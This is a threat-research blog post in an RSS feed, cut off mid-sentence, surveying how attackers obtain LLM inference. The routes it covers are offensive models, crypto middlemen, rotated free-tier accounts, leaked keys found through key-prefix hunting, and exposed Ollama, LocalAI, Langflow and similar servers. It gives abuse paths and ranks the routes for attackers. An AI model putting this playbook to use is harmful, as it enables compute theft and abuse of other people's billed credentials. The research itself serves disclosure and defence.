<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Intezer Research –</title><link>https://research.intezer.com/</link><description>Recent content on Intezer Research</description><generator>Hugo -- gohugo.io</generator><language>en-us</language><lastBuildDate>Wed, 03 Jun 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://research.intezer.com/index.xml" rel="self" type="application/rss+xml"/><item><title>How attackers are gaining access to LLM inference</title><link>https://research.intezer.com/blog/2026/06/how-attackers-access-llm-inference/</link><pubDate>Wed, 03 Jun 2026 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2026/06/how-attackers-access-llm-inference/</guid><description>
&lt;p&gt;&lt;em&gt;This article is based on joint research with Eran Segal, researcher at
&lt;a href="https://www.kodemsecurity.com/"target="_blank" rel="noopener"&gt;Kodem Security&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The most capable commercial AI models are now useful enough to attackers that
they have become an integral part of their kill chain, in multiple steps. The
&lt;a href="https://cybench.github.io/"target="_blank" rel="noopener"&gt;Cybench&lt;/a&gt; benchmark tests models on offensive cyber
tasks. Its current top performers (Claude Opus 4.6, Claude Sonnet 4.5, Grok 4)
can write functional exploit code, reason through credential chains, and
sustain complex reconnaissance workflows: multi-step offensive work that
previously required human expertise. Malware families are already using this.
Instead of generating a payload offline and shipping it, they wire a live LLM
API into the malware itself so it can adapt its behavior at runtime on the
infected host.&lt;/p&gt;
&lt;p&gt;Commercial providers run abuse detection and terminate accounts linked to
malicious activity. A payment method creates a paper trail that investigators
can follow. So attackers solve the access problem the same way they solve any
resource problem: they steal it, find it free, or find it unguarded.&lt;/p&gt;
&lt;p&gt;This post covers five routes threat actors use to reach LLM inference without
paying for it: buying offensive models on underground forums, using front-end
models using 3rd party LLM service that allows paying in bitcoin, using
free-tier or keyless public APIs, hunting for leaked API keys in developer
artifacts, and exploiting self-hosted LLM servers left open on the internet.&lt;/p&gt;
&lt;h2&gt;Method 1: Offensive LLMs and Anonymous Payment&lt;span class="hx:absolute hx:-mt-20" id="method-1-offensive-llms-and-anonymous-payment"&gt;&lt;/span&gt;
&lt;a href="#method-1-offensive-llms-and-anonymous-payment" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Cyber-oriented LLMs sold on underground forums are the most visible route.
WormGPT, GhostGPT, KawaiiGPT, and Xanthorox are the most cited examples,
covered in depth by
&lt;a href="https://unit42.paloaltonetworks.com/dilemma-of-ai-malicious-llms/"target="_blank" rel="noopener"&gt;Unit 42&lt;/a&gt;.
These are returned open-weight models or jailbroken wrappers over commercial
APIs, marketed specifically as having no content filter. They solve the
moderation problem but not the cost problem: access is sold on a subscription
basis, and the capability ceiling sits well below that of frontier commercial
models. So they are useful for generating phishing content or simple malware
stubs, but less so for the kind of autonomous multi-step offensive work that
the frontier models in the Cybench ranking are capable of.&lt;/p&gt;
&lt;h2&gt;Method 2: Using Frontier Models Through a Third-Party Service&lt;span class="hx:absolute hx:-mt-20" id="method-2-using-frontier-models-through-a-third-party-service"&gt;&lt;/span&gt;
&lt;a href="#method-2-using-frontier-models-through-a-third-party-service" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;If a threat actor would like to use the frontier models to achieve top
performance, they can still use these models using 3rd party services such as
PayWithMoon and AIMLAPI.&lt;/p&gt;
&lt;p&gt;These services sit between the attacker and a commercial LLM provider,
accepting cryptocurrency without identity verification and then funding a
legitimate provider account on the attacker&amp;rsquo;s behalf. The account itself
reaches frontier models, but the funding trail stops at the middleman. The
account will still get burned once abuse detection triggers, but replacing it
is cheap. The upstream provider has no usable identity to pursue. This is how
attackers buy frontier-model access while skipping the paper trail a normal
commercial account would leave behind.&lt;/p&gt;
&lt;h2&gt;Method 3: Free-Tier and Keyless Public Inference APIs&lt;span class="hx:absolute hx:-mt-20" id="method-3-free-tier-and-keyless-public-inference-apis"&gt;&lt;/span&gt;
&lt;a href="#method-3-free-tier-and-keyless-public-inference-apis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;A cheaper alternative to underground subscriptions exists in plain sight. Most
major inference providers publish permanent free tiers that require nothing
more than a disposable email address, and a handful of services accept requests
with no credentials at all. An attacker who registers for a pool of free-tier
accounts gets as meny tokens as he wishes without paying a dime.&lt;/p&gt;
&lt;p&gt;The scale of the free-tier ecosystem is easy to measure because the community
has cataloged it. Public curated lists such as
&lt;a href="https://github.com/cheahjs/free-llm-api-resources"target="_blank" rel="noopener"&gt;cheahjs/free-llm-api-resources&lt;/a&gt;
and
&lt;a href="https://github.com/mnfst/awesome-free-llm-apis"target="_blank" rel="noopener"&gt;mnfst/awesome-free-llm-apis&lt;/a&gt;
explicitly filter for providers that offer a permanent (not trial-credit) free
tier with no credit card. Representative entries, with numbers pulled from each
provider&amp;rsquo;s own rate-limit documentation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://console.groq.com/docs/rate-limits"target="_blank" rel="noopener"&gt;Groq&lt;/a&gt;: 30 requests/minute (RPM)
on all free-tier models, with requests/day (RPD) caps ranging from 1,000 (for
the 70B llama) to 14,400 (for the 8B llama).&lt;/li&gt;
&lt;li&gt;&lt;a href="https://inference-docs.cerebras.ai/support/rate-limits"target="_blank" rel="noopener"&gt;Cerebras&lt;/a&gt;: 30 RPM,
14,400 RPD, and roughly 1M tokens/day on three of the four free-tier models
(&lt;code&gt;gpt-oss-120b&lt;/code&gt;, &lt;code&gt;llama3.1-8b&lt;/code&gt;, &lt;code&gt;qwen-3-235b&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cohere.com/docs/rate-limits"target="_blank" rel="noopener"&gt;Cohere&lt;/a&gt;: 20 RPM on the Chat API
and a hard cap of 1,000 total API calls/month on a trial key.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.mistral.ai/deployment/ai-studio/tier"target="_blank" rel="noopener"&gt;Mistral La Plateforme&lt;/a&gt;:
1B tokens/month on the Experiment plan. No credit card is required, but a
verified phone number is required, which is the highest sign-up friction in
this group.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://huggingface.co/docs/hub/rate-limits"target="_blank" rel="noopener"&gt;HuggingFace&lt;/a&gt;: Free accounts are
rate-limited on both the Hub API and the Inference API per 5-minute window.
Anonymous per-IP access exists but is stricter than the free-account path.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openrouter.ai/docs/api/reference/limits"target="_blank" rel="noopener"&gt;OpenRouter&lt;/a&gt;: 50 free model
RPD with no deposit at all, and 1,000 RPD after a one-time $10 top-up that is
never spent against model usage.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.sambanova.ai/plans/pricing"target="_blank" rel="noopener"&gt;SambaNova&lt;/a&gt;: 20 RPM and 20 RPD,
with a 200,000 tokens/day cap. The tightest daily request ceiling in this
group by a wide margin.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These providers differ in rate limits, models, and throughput. What they share
is that a usable credential requires nothing more than a disposable email
address (a phone number in Mistral&amp;rsquo;s case) and no payment method. Credentials
can simply be rotated when limits are reached.&lt;/p&gt;
&lt;p&gt;The fully keyless end of the spectrum is thinner, but it exists.
&lt;a href="https://pollinations.ai"target="_blank" rel="noopener"&gt;Pollinations.ai&lt;/a&gt; exposes an OpenAI-compatible
endpoint that accepts requests with no authentication for basic use.
&lt;a href="https://duckduckgo.com/duckduckgo-help-pages/duckai"target="_blank" rel="noopener"&gt;DuckDuckGo&amp;rsquo;s Duck.ai&lt;/a&gt;
anonymizes browser-based access to Claude 3.5 Haiku, Llama 4 Scout, Mistral
Small 3, GPT-5 mini, and GPT-4o mini with no account at all. These services are
not designed for bulk programmatic use, but they are reachable from any HTTP
client, and the only cost is rate-limit friction.&lt;/p&gt;
&lt;p&gt;Among the malware families in the intro table, LameHug/PROMPTSTEAL is the
cleanest example of this route in the wild: it calls HuggingFace&amp;rsquo;s Inference
API for &lt;code&gt;Qwen 2.5-Coder-32B-Instruct&lt;/code&gt; to drive reconnaissance and data theft,
with no embedded credentials reported by
&lt;a href="https://www.splunk.com/en_us/blog/security/lamehug-ai-driven-malware-llm-cyber-intrusion-analysis.html"target="_blank" rel="noopener"&gt;Splunk&lt;/a&gt;.
Whether the malware carries a token or registers one at runtime is not
established, but either way, the enabling property is HuggingFace&amp;rsquo;s
no-credit-card free tier.&lt;/p&gt;
&lt;h2&gt;Method 4: Exposed API Keys&lt;span class="hx:absolute hx:-mt-20" id="method-4-exposed-api-keys"&gt;&lt;/span&gt;
&lt;a href="#method-4-exposed-api-keys" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The fourth route to free model access doesn&amp;rsquo;t require finding an exposed server
at all. Developers routinely hardcode credentials directly into apps, config
files, and scripts. These credentials can be found in GitHub in open-source
projects, while closed-source projects contain the credentials in the app
itself. These artifacts are submitted to VirusTotal when apps are submitted for
malware analysis. It can be an APK, ELF, EXE, or any type of artifact shipped
with the product.&lt;/p&gt;
&lt;p&gt;To find them systematically, we wrote a YARA rule targeting the key formats of
the major AI providers: Google Gemini (&lt;code&gt;AIzaSy…&lt;/code&gt;), OpenAI (&lt;code&gt;sk-…&lt;/code&gt;), Anthropic
(&lt;code&gt;sk-ant-…&lt;/code&gt;), HuggingFace (&lt;code&gt;hf_…&lt;/code&gt;), Replicate, Mistral, Cohere, Groq, and
several others. We ran the rule as a retrohunting query across the VirusTotal
corpus, collected the matching sample hashes, then pulled the raw files and ran
a regex extraction pass to extract every key-value pair, provider, and
surrounding code context. From there, we enriched each sample with VirusTotal
metadata to understand detection rates and file types. The final step was
validation: a lightweight GET request against each provider&amp;rsquo;s model-list or
whoami endpoint. No prompts sent, just a check of whether the key
authenticates.&lt;/p&gt;
&lt;p&gt;The corpus yielded 647 unique keys across all providers. Roughly 62% were
Google Gemini (&lt;code&gt;AIzaSy…&lt;/code&gt;) keys. That concentration traces back to the Android
developer ecosystem, where apps built for translation, search, or chatbot
features commonly bundle the key directly in compiled resources or Java code.
HuggingFace keys made up about 11%, Replicate about 8%, OpenAI &lt;code&gt;sk-&lt;/code&gt; keys about
7%, and the remaining share was split across Voyage (5%), Mistral (3%), and
Cohere (3%), with trace amounts of Anthropic, Groq, and OpenAI
environment-style keys. The Mistral and Cohere keys concentrated heavily in a
single file: a cracked &amp;ldquo;Collins Italian Dictionary MOD&amp;rdquo; Android APK that
bundled 20 Mistral keys and 15 Cohere keys alongside 2 Gemini keys, with the
small remainder scattered across two versions of a Ubisoft game APK.&lt;/p&gt;
&lt;p&gt;About 65% of the 659 unique samples are confirmed Android by VirusTotal&amp;rsquo;s type
classification. Another 18% are ZIP archives that follow the same submission
pattern but were not explicitly tagged as Android. The true APK share sits
between 65% and 84%. The remainder consisted of Windows PE files (5%), HTML
pages, Python scripts, plain-text credential dumps, and a handful of Mach-O and
ELF binaries. That Android skew isn&amp;rsquo;t surprising. APKs are frequently submitted
to VirusTotal for modding and repackaging, and their keys remain intact after
decompilation.&lt;/p&gt;
&lt;p&gt;We submitted research samples to Intezer Analyze for code-based attribution,
and three entries stand out. Four samples whose filenames suggested Akira
ransomware are three Mimikatz binaries
(&lt;a href="https://analyze.intezer.com/analyses/a7cac75b-37b7-4824-96e3-0f667cda7372"target="_blank" rel="noopener"&gt;1&lt;/a&gt;,
&lt;a href="https://analyze.intezer.com/analyses/dd53f33a-88a8-4ad9-9e41-cc370af46167"target="_blank" rel="noopener"&gt;2&lt;/a&gt;,
&lt;a href="https://analyze.intezer.com/analyses/396acd43-b1fc-4719-947e-8d368f7801c1"target="_blank" rel="noopener"&gt;3&lt;/a&gt;)
and one
&lt;a href="https://analyze.intezer.com/analyses/30ae2211-20a9-47c8-bbf4-9f2f56176684"target="_blank" rel="noopener"&gt;malicious binary without family attribution&lt;/a&gt;,
all credential-dumping tools that happened to carry API keys. The sample with a
HuggingFace key is
&lt;a href="https://analyze.intezer.com/analyses/f646aa6c-b788-400a-b9f6-5cfcc7f619b9"target="_blank" rel="noopener"&gt;SolarMarker&lt;/a&gt;,
an SEO-poisoning backdoor with infostealer capability. A Windows binary named
&lt;code&gt;SystemSettings.exe&lt;/code&gt; contained OpenAI, Replicate, and Voyage keys; the
multi-key combination is more consistent with theft from a developer&amp;rsquo;s machine
than with intentional hardcoding.&lt;/p&gt;
&lt;p&gt;When we ran the validation, almost all the keys were dead. The revocation rate
was approximately 99.5%, consistent with a corpus skewed toward older samples
that had been on VirusTotal long enough to be detected, rotated, or simply
expired. The small fraction that remained live consisted entirely of Google
Gemini keys from Android APKs. All appeared to be genuine developer mistakes
rather than exfiltrated credentials: a key embedded in a &lt;code&gt;const&lt;/code&gt; in bundled
JavaScript, one in a logging module in a compiled Android class, and one in a
utility app&amp;rsquo;s APK resources. Those three keys have been reported to Google.&lt;/p&gt;
&lt;p&gt;The method also illustrates why embedding API keys in client software is a
particularly bad idea. Extracting a key from an APK requires a decompiler, and
APKs have a reliable path to VirusTotal: users submit them for malware checks,
repackaged versions circulate through third-party stores, and cracked builds
get flagged automatically. The near-total revocation rate strongly suggests
that LLM providers scan VirusTotal for their own key formats and automatically
revoke matches. The three keys that were still live were all recent
submissions, not yet caught by that sweep. If that pipeline exists, embedding a
key in client-side code is not just a security mistake, but a futile one, and
the key will likely be dead before it can be abused at scale.&lt;/p&gt;
&lt;p&gt;The takeaway for an attacker is that hunting VirusTotal for hardcoded keys is
low-effort but low-yield. The more durable access method is the exposed LLM
server. A server running vLLM (a popular open-source LLM inference framework)
or an open Ollama instance requires no authentication, doesn&amp;rsquo;t rotate anything
while in use, and the owner usually doesn&amp;rsquo;t know it&amp;rsquo;s happening.&lt;/p&gt;
&lt;h2&gt;Method 5: Hack Public LLM Hosting Servers&lt;span class="hx:absolute hx:-mt-20" id="method-5-hack-public-llm-hosting-servers"&gt;&lt;/span&gt;
&lt;a href="#method-5-hack-public-llm-hosting-servers" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Self-hosted LLM platforms make it easy to run your own models on your
infrastructure, and that same ease extends to anyone who can access the port.
Most ships have no authentication by default and expose administrative
endpoints that let a stranger list installed models, queue inference jobs, load
new models from remote URLs, or, in several cases, execute code on the host.
When the server is exposed to the public internet, the attacker does not need a
stolen key or a forum subscription. The victim is paying the GPU bill, carrying
the API-key spend, or hosting the RCE.&lt;/p&gt;
&lt;p&gt;We scanned roughly 4,500 hosts across eleven of them. Every service had open
instances, and 14 LocalAI hosts showed active compromise based on
attacker-loaded model names consistent with a single automated campaign. The
sections below cover what each platform is, how exposure gets abused, and what
the scan found in the wild.&lt;/p&gt;
&lt;h3&gt;Ollama&lt;span class="hx:absolute hx:-mt-20" id="ollama"&gt;&lt;/span&gt;
&lt;a href="#ollama" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Ollama runs open-weight LLMs locally. By default, it binds to &lt;code&gt;127.0.0.1&lt;/code&gt;, and
the authentication is disabled. But setting &lt;code&gt;OLLAMA_HOST=0.0.0.0&lt;/code&gt; is a common
step when accessing it from another machine on the network or from a frontend
app running in a separate container. It exposes all interfaces, and anyone
reaching it&amp;rsquo;s port gets full API, model management, and hardware access.
&lt;a href="https://www.sentinelone.com/labs/silent-brothers-ollama-hosts-form-anonymous-ai-network-beyond-platform-guardrails/"target="_blank" rel="noopener"&gt;SentinelOne Labs and Censys already published the definitive survey&lt;/a&gt;,
documenting 175,000+ hosts chained into anonymous AI networks for free text,
embedding, and bulk content generation on victim hardware. That pattern is now
commercialized by
&lt;a href="https://www.pillar.security/blog/operation-bizarre-bazaar-first-attributed-llmjacking-campaign-with-commercial-marketplace-monetization"target="_blank" rel="noopener"&gt;Operation Bizarre Bazaar&lt;/a&gt;,
which sells subscription access to a unified LLM gateway fronted by stolen
Ollama endpoints, turning ad-hoc LLMjacking into a growing concern.&lt;/p&gt;
&lt;h3&gt;LocalAI&lt;span class="hx:absolute hx:-mt-20" id="localai"&gt;&lt;/span&gt;
&lt;a href="#localai" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;LocalAI is an OpenAI API-compatible model server supporting LLMs, image
generation, speech, and transcription.
&lt;a href="https://localai.io/features/authentication/"target="_blank" rel="noopener"&gt;Authentication is disabled by default.&lt;/a&gt;
It also supports remote model installation, P2P distributed serving, and a
built-in agent platform with support for MCP. Of all the services in this
research, it has the widest attack surface.&lt;/p&gt;
&lt;p&gt;Of all the hosts scanned, 55% were confirmed open, the highest absolute count
in this group. About 24% are API proxies with live upstream keys for OpenAI,
Anthropic, and Google accessible to anyone who can reach the host.&lt;/p&gt;
&lt;p&gt;The most striking finding is evidence of automated exploitation at scale. About
21% of confirmed hosts carry model names with a consistent signature tied to
&lt;a href="https://projectdiscovery.io/nuclei"target="_blank" rel="noopener"&gt;ProjectDiscovery&amp;rsquo;s nuclei&lt;/a&gt; scanner
templates, with per-run timestamps mapping to late March and early April 2026.
The pattern is consistent with automated scanning for an unauthenticated remote
code execution path, in which a malicious URL supplied during model
installation triggers server-side code execution. The exploit payload appears
to load a small publicly available Italian-language model as a &amp;ldquo;hello world&amp;rdquo;
confirmation, which recurs on every affected host. The markers not being
cleaned up argue against mature attacker tradecraft. Operators running LocalAI
can open &lt;code&gt;/v1/models&lt;/code&gt; on their own host: any &lt;code&gt;nuclei-rce-*&lt;/code&gt; or
&lt;code&gt;rce_&amp;lt;timestamp&amp;gt;&lt;/code&gt; identifier is not human-chosen and indicates this campaign
hit them.&lt;/p&gt;
&lt;h3&gt;Langflow&lt;span class="hx:absolute hx:-mt-20" id="langflow"&gt;&lt;/span&gt;
&lt;a href="#langflow" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Langflow is a visual builder for multi-agent AI pipelines, widely used to
prototype RAG systems and chatbots. Flows routinely embed hardcoded
credentials: OpenAI and Anthropic API keys, database connection strings, Slack
tokens, and webhook secrets. Anyone who can reach the host and read a flow
config has all of them. Unlike the previous examples, this app does not have a
known major misconfiguration, but it does not prevent attackers from being able
to hack and gain access to this service. For example, two unauthenticated RCE
bugs make reaching the config trivial:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2025-3248"target="_blank" rel="noopener"&gt;CVE-2025-3248&lt;/a&gt;: on the CISA
KEV list, reliably patched only in 1.6.4+&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours"target="_blank" rel="noopener"&gt;CVE-2026-33017&lt;/a&gt;:
fixed in 1.9.0, exploited in the wild within 20 hours of disclosure.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Every confirmed host in our scan ran a version vulnerable to CVE-2026-33017;
about 72% were also vulnerable to CVE-2025-3248. Several hosts didn&amp;rsquo;t
authenticate at all, with flows, credentials, and both RCE paths openly
accessible. Code execution on the Langflow host is the small prize. The keys
inside the flows pivot to everything the workflows connect to.&lt;/p&gt;
&lt;h3&gt;n8n&lt;span class="hx:absolute hx:-mt-20" id="n8n"&gt;&lt;/span&gt;
&lt;a href="#n8n" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;n8n is a low-code workflow automation platform with 400+ service connectors and
code execution nodes (workflow steps that run arbitrary scripts). It has the
strongest default auth posture of any service in this research: User Management
is enforced on fresh installs.&lt;/p&gt;
&lt;p&gt;But it does not prevent attackers from actively gaining access to n8n.
Vulnerabilities such as
&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21858"target="_blank" rel="noopener"&gt;CVE-2026-21858&lt;/a&gt; (&amp;ldquo;Ni8mare&amp;rdquo;,
CVSS 10.0, fixed in 1.121.0), which is a vulnerability in the web hooks request
handling that turns exposed endpoints into a full unauthenticated RCE surface
via content-type confusion, with a
&lt;a href="https://github.com/Chocapikk/CVE-2026-21858"target="_blank" rel="noopener"&gt;public PoC&lt;/a&gt; already out. Prior
research estimates the exposed n8n population at tens of thousands of hosts.&lt;/p&gt;
&lt;p&gt;The post-exploitation story mirrors Langflow. Workflows carry hardcoded API
keys, database connection strings, and webhook secrets. RCE on the n8n host
effectively gives access to every system the automations touch.&lt;/p&gt;
&lt;h3&gt;vLLM&lt;span class="hx:absolute hx:-mt-20" id="vllm"&gt;&lt;/span&gt;
&lt;a href="#vllm" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;vLLM is a high-throughput LLM serving engine with GPU acceleration, commonly
used to self-host open-weight models in production. It exposes an
OpenAI-compatible REST API. Authentication requires an explicit &lt;code&gt;--api-key&lt;/code&gt;
flag; without it, the API is open.&lt;/p&gt;
&lt;p&gt;The interesting finding from our scan was not vLLM itself but the adjacent
deployments surfaced by the same query: OpenAI-compatible HTTP proxies,
specifically LiteLLM-style gateways that aggregate multiple paid providers
behind a single endpoint. These proxies store live API keys for OpenAI,
Anthropic, Google, Groq, and Cohere. None had protection on the model list
endpoint. One host exposed 35 models across multiple providers; several listed
exclusively Anthropic Claude models. A proxy returns a model list only when the
upstream provider authenticates, so every successful response confirms the
underlying keys are live and billable.&lt;/p&gt;
&lt;p&gt;The abuse path is trivial: point any standard OpenAI SDK client at the proxy,
enumerate the models, and, on hosts where prompt submission is also
unprotected, send requests billed to the operator&amp;rsquo;s accounts. It is the same
credential-pivot pattern as Langflow and n8n.&lt;/p&gt;
&lt;h3&gt;ComfyUI&lt;span class="hx:absolute hx:-mt-20" id="comfyui"&gt;&lt;/span&gt;
&lt;a href="#comfyui" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;ComfyUI is a node-based workflow UI for Stable Diffusion, video generation, and
multimodal image models. It runs on high-end GPU hardware with no
authentication by default, making it a direct target for attackers looking to
steal GPU compute.&lt;/p&gt;
&lt;p&gt;Our scan found open instances across a wide range of versions (v0.2.2 to
0.19.0), all of which were fully unauthenticated. The hardware exposure is the
headline finding. Open hosts reported a combined ~4.3 TB of GPU VRAM, with
cards ranging from RTX 4090s and RTX 5090s to datacenter-grade A100S and L40S
units, each worth tens of thousands of dollars. An attacker can queue
generation jobs against any of them at no cost.&lt;/p&gt;
&lt;p&gt;Beyond compute theft, 95% of open hosts expose a job history endpoint that
leaks previously executed workflows, local file paths, and prior user content.
About 12% advertise URL-loading nodes that act as server-side request forgery
primitives: usable for internal network reconnaissance or cloud metadata
credential theft.&lt;/p&gt;
&lt;h3&gt;llama.cpp server&lt;span class="hx:absolute hx:-mt-20" id="llamacpp-server"&gt;&lt;/span&gt;
&lt;a href="#llamacpp-server" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;llama-server&lt;/code&gt; is the HTTP server shipped with llama.cpp, commonly used to
serve a single open-weight model in production. It has no authentication by
default, no access controls on the inference endpoint, and a metadata endpoint
that advertises exactly what the host is running. Anyone who reaches the port
can submit prompts, watch active jobs, and burn the operator&amp;rsquo;s GPU on their own
workload. Classic LLMjacking, with the bonus of knowing exactly which model
they are running.&lt;/p&gt;
&lt;p&gt;Of scanned hosts, 59% were confirmed open, more than any other platform in the
scan. Everyone exposed its model name and hardware configuration, and about 37%
also leaked real-time job state, confirming the host was actively serving users
at the time of the scan. The models observed were standard open-weight builds
rather than anything exotic, which is the point. An attacker is not looking for
a rare model, just an unattended GPU.&lt;/p&gt;
&lt;h3&gt;Jan&lt;span class="hx:absolute hx:-mt-20" id="jan"&gt;&lt;/span&gt;
&lt;a href="#jan" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Jan is an Electron desktop AI app with an optional OpenAI-compatible API server
on port 1337. When enabled, it binds to all interfaces with no authentication.
Jan is a useful example of how exposure surfaces unexpected content rather than
how common it is. Our scan confirmed only two genuine Jan hosts. Both had gone
offline by the rescan a week later. While one was live, it exposed a 35-model
library that included &lt;code&gt;miqu-70b&lt;/code&gt;; a
&lt;a href="https://the-decoder.com/unintentional-ai-leak-from-mistral-becomes-an-unexpected-powerhouse/"target="_blank" rel="noopener"&gt;leaked Mistral Medium prototype&lt;/a&gt;
that was never officially released. When a desktop app binds its API server to
the public internet, whatever model (or file path metadata) sits on the
operator&amp;rsquo;s disk becomes visible.&lt;/p&gt;
&lt;h3&gt;Gradio&lt;span class="hx:absolute hx:-mt-20" id="gradio"&gt;&lt;/span&gt;
&lt;a href="#gradio" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Gradio is a Python framework for building ML demo apps: image classifiers, code
interpreters, document Q&amp;amp;A, or anything a researcher can wrap in a web UI.
Exposure risk depends entirely on what the underlying app does. A
sentiment-analysis demo is low-stakes. An app that accepts file uploads, runs
user code, or queries a database is a direct path to exploitation. The Gradio
queue keeps processing submitted requests whether the operator is watching or
not, so abuse can run quietly for days.&lt;/p&gt;
&lt;p&gt;Three unauthenticated bugs make unpatched instances worse:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/advisories/GHSA-g9cj-cfpp-4g2x"target="_blank" rel="noopener"&gt;CVE-2024-1561&lt;/a&gt;: arbitrary
file read, fixed in 4.13.0&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/advisories/GHSA-f3h9-8phc-6gvh"target="_blank" rel="noopener"&gt;CVE-2024-0964&lt;/a&gt;: path
traversal, fixed in 4.9.0&lt;/li&gt;
&lt;li&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47084"target="_blank" rel="noopener"&gt;CVE-2024-47084&lt;/a&gt;: CORS
validation bypass, fixed in 4.44.0; a malicious website can reach a locally
running Gradio server while the victim is still logged in&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Ranking the Five Routes&lt;span class="hx:absolute hx:-mt-20" id="ranking-the-five-routes"&gt;&lt;/span&gt;
&lt;a href="#ranking-the-five-routes" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Each route carries operational trade-offs. The table below scores each on five
dimensions, ranging from 0 (least favorable) to 5 (best for attacking):
non-resistance (refusal behavior in response to offensive prompts), model
capability (coding ability and parameter count), tool and MCP support, and
effective token quota.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Route&lt;/th&gt;
&lt;th&gt;Non-resistant model&lt;/th&gt;
&lt;th&gt;Model capability&lt;/th&gt;
&lt;th&gt;Tool / MCP support&lt;/th&gt;
&lt;th&gt;Token quota&lt;/th&gt;
&lt;th&gt;Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Offensive LLMs (WormGPT, GhostGPT, crypto middlemen)&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Crypto payment for frontier&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Free-tier and keyless public APIs&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stolen or leaked API keys&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exposed LLM servers&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Offensive LLMs score highest on non-resistance. But the underground-forum
variants sit well below frontier models in capability and tool support, and
subscriptions cap the quota. The crypto-middleman variant reaches frontier
models via real provider accounts, but those accounts burn quickly once abuse
is detected.&lt;/p&gt;
&lt;p&gt;Crypto payment for frontier models is for sure the best way to gain access for
the most capable models with the ability to connect the model to any interface,
such as MCPs, but it comes with some risks that the model might resist the
action or the user will be blocked.&lt;/p&gt;
&lt;p&gt;Free-tier and keyless public APIs score well in capability and tool support,
with full-function calling across most providers. The per-account quota is
modest, tens of RPM, thousands of RPD, but trivial account rotation pushes the
effective quota well above the face value.&lt;/p&gt;
&lt;p&gt;Stolen or leaked API keys, in principle, offer the best combination of
capability and tool support; the retrohunt&amp;rsquo;s 0.5% live rate shows the
real-world quota is near zero.&lt;/p&gt;
&lt;p&gt;Exposed LLM servers score highest on non-resistance and token quota.
Non-resistance is unconstrained: the attacker controls model selection, and our
